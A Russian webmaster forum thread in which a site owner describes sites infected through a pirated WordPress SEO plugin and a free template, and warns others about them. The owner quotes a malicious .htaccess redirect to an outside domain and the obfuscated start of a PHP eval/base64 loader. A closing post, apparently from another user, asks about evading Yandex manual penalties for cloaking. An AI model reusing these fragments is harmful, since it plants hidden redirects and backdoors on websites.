MrDesigner,
Так я про это и писал с самого начала, вы меня не поняли, что вирус был в плагине, но как доказать это яндексу, они то мне написали что я поставил мобильный редирект чтобы денег заработать!
DLE только лицензия, не проблема купить ее за 3000р. когда сайт приносит 40000ежемесячно. И да, сайт был с большим трафиком белый и пушистый.
Почему же дважды LOL? Здесь нет ничего смешного что я новичок в этом деле. Каюсь что сам накосячил, скачал из интернета плагин и шаблон. И не проверил файлы.
Благо хостер мой вразумил меня и наставил на путь истинный:
По поводу дырки от бублика - писать кричащие заголовки сеошник должен уметь, вот видите сколько народу проявило любопытство и прочитало)). Кстати за 3 года работы с DLE ни разу не было вирусов.
Всем спасибо за ответы. Подозрительный файл был в плагине, но сам вирус оказался в дизайне (шаблоне) скаченном из интернета. Так что, кто пользуется бесплатными шаблонами, проверяйте, туда кладут вирусы.
А тем кто ставит минусы в репу, зачем? Я создал этот топик для помощи, честно признаюсь что я ничего в этом не понимаю - нуб я. С wordpress столкнулся впервые. Даже не знал куда можно еще обратится.
Да хорошее правило, сейчас так и сделал. Восстановил бекап сайтов и разместил уже на разных аккаунтах. Посмотрим что скажут ребята из яндекса
Спасибо. Самый дельный совет. Так и сделал, даже не знал про такую прогу :)
Притом что он давал модифицировать системные файлы. ДА и вообще теперь он мне не нравится 😡
Уж больно легко заражаются wordpress сайты с этими плагинами. Тем, кто, как я не профессионально занимается вебмастерингом, легко попастся на удочку мошенников, распространяющих вирусы под видом плагинов для wordpress.
Плагин
All in One SEO Pack, каюсь, скачал из инета....
Вот этого я и боюсь, что никто не поверит, тем более в яндексе... (как вы например).
Через seo плагин был залит шеел. Хостинг сразу же ругался и выдал вирус {CAV}Php.Trojan.StopPost, я его удалить смог только через 2 дня, т.к. область заражения была огромная (десяток сайтов).
htaccess прописывалось следующее:
RewriteCond %{REMOTE_ADDR} ^213\.87\.(128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143)\. [OR]
RewriteRule .* http://warp-master.ru/opera/load/ [L,R]
и далее....
В файлы движков добавлялся php код, и обнаружил неизвестный файл в корне сайта:
<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54)."\x34_".chr(100)."".chr(101)."".chr(99)."o\x64e".chr(40)."";$O9654 = "".chr(41)."\x29)".chr(59)."";$jlvpdR6408 = $Gcwa9593."'TZxXr.
Вместо тысячи тем "Минусинск заработал"
А мой то подключите?
Аналогично... А дело вот в чем. Придумал свою защиту от яндекса - 100% работала. Пока какой-то олень не пожаловался на мой сайт через "чудо-кнопку". Затем через 3 дня код убрал, метку сняли. Но как защиту обновил, код вернул, опять кто-то настучал в яндкес. Вот что значит сайт в топ №1 по своему запросу...
Как избавиться от ручных меток (по стуку)?
